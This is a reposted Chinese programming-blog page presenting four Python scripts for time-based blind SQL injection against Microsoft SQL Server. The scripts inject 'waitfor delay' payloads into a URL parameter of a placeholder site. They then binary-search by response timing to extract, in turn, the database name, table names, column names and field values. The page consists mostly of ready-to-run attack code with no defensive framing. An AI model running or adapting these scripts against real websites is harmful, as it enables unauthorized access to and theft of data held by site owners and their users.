SQL server 时间盲注脚本

小小码 • 2023-04-18 16:00 • 代码基础 • 阅读 162

一键激活最新全家桶

SQL server 时间盲注脚本
一、爆破当前数据库名 #coding:utf-8 import requests import time import string import sys …

大家好，我是考100分的小小码，祝大家学习进步，加薪顺利呀。今天说一说SQL server 时间盲注脚本,希望您对编程的造诣更进一步.

SQL server 时间盲注脚本[数据库教程]

一、爆破当前数据库名

#coding:utf-8
 
import requests
import time
import string
import sys
 
headers = {"user-agent":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"}
#chars = ‘0123456789.@_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz‘
databases = []
length = []


for l in range(1,50):
    lengthUrl = "http://www.xxxx.com/id.aspx?classify=1‘;if(len((select db_name())))>{0} waitfor delay ‘0:0:1‘ -- "
    lengthUrlFormat = lengthUrl.format(l)
    start_time0 = time.time()
    rsp0 = requests.get(lengthUrlFormat,headers=headers)
    if  time.time() - start_time0 < 2:
        length.append(l)
        print(‘ length is ‘ + str(l))
        break
    else:
        pass
print(length)


databasename = ‘‘
for i in range(1,length[0]+1):
    min_value = 48
    max_value = 122
    mid = (min_value + max_value) // 2
    while(min_value < max_value):
        url = "http://www.xxxx.com/id.aspx?classify=1.aspx?classify=1‘;if(ascii(substring((select db_name()),{0},1)))>{1} waitfor delay ‘0:0:1‘ --"
        urlformat = url.format(i,mid)
        start_time = time.time()
        rsp = requests.get(urlformat,headers=headers)
        if  time.time() - start_time > 2:
            min_value = mid + 1
        else:
            max_value = mid
            pass
        mid = (min_value+max_value)//2
    databasename+=chr(mid)
    print(databasename)
databases.append(databasename)
print(databases)

二、爆破表名

#coding:utf-8
 
import requests
import time
import string
import sys
 
headers = {"user-agent":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"}
#chars = ‘0123456789.@_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz‘
tables = []
length = []
num = []
num2 = []

for i in range(0,1000):
    tablenum = "http://www.xxxx.com/id.aspx?classify=1‘;if(ascii(substring((select top 1 name from DB..sysobjects where xtype=‘U‘ and name not in (select top {0} name from sys.tables)),1,1)))>0 waitfor delay ‘0:0:1‘ -- "
    tablenumFormat = tablenum.format(i)
    start_time0 = time.time()
    rsp1 = requests.get(tablenumFormat,headers=headers)
    num.append(i)
    num2.append(i)
    if  time.time() - start_time0 < 2:
            break
    else:
        pass
#print(num)
num.pop()

for n in num:
    for l in range(1,50):
        lengthUrl = "http://www.xxxx.com/id.aspx?classify=1‘;if(len((select top 1 name from DB..sysobjects where xtype=‘U‘ and name not in (select top {0} name from sys.tables))))>{1} waitfor delay ‘0:0:1‘ -- "
        lengthUrlFormat = lengthUrl.format(n,l)
        start_time0 = time.time()
        rsp0 = requests.get(lengthUrlFormat,headers=headers)
        if  time.time() - start_time0 < 2:
            length.append(l)
            #print(‘ length is ‘ + str(l))
            break
        else:
            pass
#print(length)

for n in num:
    tablename = ‘‘
    le = num.index(n)
    for i in range(1,length[le]+1):
        min_value = 48
        max_value = 122
        mid = (min_value + max_value) // 2
        while(min_value < max_value):
            url = "http://www.xxxx.com/id.aspx?classify=1‘;if(ascii(substring((select top 1 name from DB..sysobjects where xtype=‘U‘ and name not in (select top {0} name from sys.tables)),{1},1)))>{2} waitfor delay ‘0:0:1‘ --"
            urlformat = url.format(n,i,mid)
            start_time = time.time()
            rsp = requests.get(urlformat,headers=headers)
            if  time.time() - start_time > 2:
                min_value = mid + 1
            else:
                max_value = mid
                pass
            mid = (min_value+max_value)//2
        tablename+=chr(mid)
        #print(tablename)
    tables.append(tablename)
for j in range(0,len(num)):
	print("第%d表名:%s"%(num[j],tables[j]))

三、爆破字段名

#coding:utf-8
 
import requests
import time
import string
import sys
 
headers = {"user-agent":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"}
#chars = ‘0123456789.@_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz‘
tables = []
length = []
num = []
num2 = []

for i in range(0,1000):
    tablenum = "http://www.xxxx.com/id.aspx?classify=1‘;if(ascii(substring((select top 1 name from DB..syscolumns  Where id=Object_Id(‘表名‘) and name not in (select top {0} name from DB..syscolumns Where id=Object_Id(‘表名‘))),1,1)))>0 waitfor delay ‘0:0:1‘ -- "
    tablenumFormat = tablenum.format(i)
    start_time0 = time.time()
    rsp1 = requests.get(tablenumFormat,headers=headers)
    num.append(i)
    num2.append(i)
    if  time.time() - start_time0 < 2:
            break
    else:
        pass
print(num)
num.pop()

for n in num:
    for l in range(1,50):
        lengthUrl = "http://www.xxxx.com/id.aspx?classify=1‘;if(len((select top 1 name from DB..syscolumns Where id=Object_Id(‘表名‘) and name not in (select top {0} name from DB..syscolumns Where id=Object_Id(‘表名‘)))))>{1} waitfor delay ‘0:0:1‘ -- "
        lengthUrlFormat = lengthUrl.format(n,l)
        start_time0 = time.time()
        rsp0 = requests.get(lengthUrlFormat,headers=headers)
        if  time.time() - start_time0 < 2:
            length.append(l)
            print(‘ length is ‘ + str(l))
            break
        else:
            pass
print(length)

for n in num:
    tablename = ‘‘
    le = num.index(n)
    for i in range(1,length[le]+1):
        min_value = 48
        max_value = 122
        mid = (min_value + max_value) // 2
        while(min_value < max_value):
            url = "http://www.xxxx.com/id.aspx?classify=1‘;if(ascii(substring((select top 1 name from DB..syscolumns Where id=Object_Id(‘表名‘) and name not in (select top {0} name from DB..syscolumns Where id=Object_Id(‘表名‘))),{1},1)))>{2} waitfor delay ‘0:0:1‘ -- "
            urlformat = url.format(n,i,mid)
            start_time = time.time()
            rsp = requests.get(urlformat,headers=headers)
            if  time.time() - start_time > 2:
                min_value = mid + 1
            else:
                max_value = mid
                pass
            mid = (min_value+max_value)//2
        tablename+=chr(mid)
        print(tablename)
    tables.append(tablename)
for j in range(0,len(num)):
    print("第%d列名:%s"%(num[j],tables[j]))

四、爆破字段值

#coding:utf-8
 
import requests
import time
import string
import sys
 
headers = {"user-agent":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"}
#chars = ‘0123456789.@_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz‘
tables = []
length = []
num = []
num2 = []

for i in range(0,1000):
    tablenum = "http://www.xxxx.com/id.aspx?classify=1‘;if(ascii(substring((select top 1 字段名 from DB..表名 where Account not in (select top {0} 字段名 from DB..表名)),1,1)))>0 waitfor delay ‘0:0:1‘ -- "
    tablenumFormat = tablenum.format(i)
    start_time0 = time.time()
    rsp1 = requests.get(tablenumFormat,headers=headers)
    num.append(i)
    num2.append(i)
    if  time.time() - start_time0 < 2:
            break
    else:
        pass
print(num)
num.pop()

for n in num:
    for l in range(1,20):
        lengthUrl = "http://www.xxxx.com/id.aspx?classify=1‘;if(len((select top 1 字段名 from DB..表名 where Account not in (select top {0} 字段名 from DB..表名))))>{1} waitfor delay ‘0:0:1‘ -- "
        lengthUrlFormat = lengthUrl.format(n,l)
        start_time0 = time.time()
        rsp0 = requests.get(lengthUrlFormat,headers=headers)
        if  time.time() - start_time0 < 2:
            length.append(l)
            print(‘ length is ‘ + str(l))
            break
        else:
            pass
print(length)

for n in num:
    tablename = ‘‘
    le = num.index(n)
    for i in range(1,length[le]+1):
        min_value = 48
        max_value = 122
        mid = (min_value + max_value) // 2
        while(min_value < max_value):
            url = "http://www.xxxx.com/id.aspx?classify=1‘;if(ascii(substring((select top 1 字段名 from DB..表名 Where Account not in (select top {0} 字段名 from DB..表名)),{1},1)))>{2} waitfor delay ‘0:0:1‘ -- "
            urlformat = url.format(n,i,mid)
            start_time = time.time()
            rsp = requests.get(urlformat,headers=headers)
            if  time.time() - start_time > 2:
                min_value = mid + 1
            else:
                max_value = mid
                pass
            mid = (min_value+max_value)//2
        tablename+=chr(mid)
        print(tablename)
    tables.append(tablename)
for j in range(0,len(num)):
    print("第%d值:%s"%(num[j],tables[j]))

SQL server 时间盲注脚本

原文：https://www.cnblogs.com/sakura521/p/14988486.html

版权声明：本文内容由互联网用户自发贡献，该文观点仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容，请发送邮件至举报，一经查实，本站将立刻删除。
转载请注明出处: https://daima100.com/6044.html

赞 (0)

0 0

启动Redis集群报错（Sorry, can’t connect to node） -「终于解决」

上一篇 2023-04-18

hadoop启动hdfs命令_hadoop源码怎么使用

下一篇 2023-04-18

代码基础

postgresql中时间转换TO_DATE和TO_TIMESTAMP

postgresql中时间转换TO_DATE和TO_TIMESTAMP起因：使用TO_DATE转换时分秒的数据时，将当天的数据过滤掉了，实际并没有统计到当天数据，发现TO_DATE转换的时候，不带有时分秒，这个跟oracle差异较大。解决办法 1.使用TO_TIME…

小小码
2023-03-17
155
代码基础

Redis大厂常问面试题解析「建议收藏」

Redis大厂常问面试题解析「建议收藏」什么是Redis ? 简单描述一下Redis的特点有哪些? Redis支持的数据类型为什么Redis需要把所有数据放到内存中? Redis是单线程的吗? Redis持久化机制有哪些?区别是什么?优缺

小小码
2023-02-01
153
代码基础

mysql主要功能介绍_外键的作用

mysql主要功能介绍_外键的作用(一)id列：（二）select_type列：数据读取操作的操作类型 1、SIMPLE:简单的select 查询，SQL中不包含子查询或者UNION。 2、PRIMARY:查询中包含复杂的子查询部分

小小码
2023-01-24
149
代码基础

Python中的文件关闭方法

Python中的文件关闭方法在Python中，文件是一个重要的概念， Python提供了许多文件读写操作的API函数。使用完文件后，我们需要及时地关闭文件，释放资源。Python中关闭文件的方法有多种，下面我们将分别介绍。

admin
2024-01-05
108
代码基础

SQL语句查询表的主键的名字[通俗易懂]

SQL语句查询表的主键的名字[通俗易懂]将表名替换成自己要查的表名： SELECT TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.KEY_COLUMN_USAGE WHERE TABLE_N…

小小码
2023-04-04
191
代码基础

使用Python编写一个漫步器

使用Python编写一个漫步器漫步器是模拟人类随机化步行路径的算法，适用于很多领域，如城市规划、环境管理、地理信息系统等。漫步器强调的是模拟随机性，每一步都是随机且独立的。

admin
2024-02-18
97
代码基础

win7原版系统安装教程_windows怎么安装

win7原版系统安装教程_windows怎么安装
场景 PostgreSQL PostgreSQL是一个功能强大的开源对象关系数据库管理系统(ORDBMS)。用于安全地存储数据; 支持最佳做法，并允许在处…

小小码
2023-04-08
160
代码基础

使用Python创建文件夹

使用Python创建文件夹a href=”https://beian.miit.gov.cn/”苏ICP备号-1/a Copyright www.python100.com .Some Rights Reserved.

admin
2024-07-09
45

发表回复